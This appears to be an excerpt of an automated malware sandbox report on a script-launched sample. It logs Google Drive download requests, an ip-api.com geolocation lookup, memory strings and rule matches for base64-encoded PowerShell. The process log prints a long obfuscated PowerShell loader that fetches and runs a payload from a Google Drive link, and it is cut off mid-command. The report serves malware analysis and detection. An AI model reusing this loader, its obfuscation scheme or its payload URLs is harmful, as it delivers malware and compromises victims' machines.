Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73 |
Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186 |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPb |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP |
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download |
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49701 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49701 |
Source: amsi32_6136.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplO |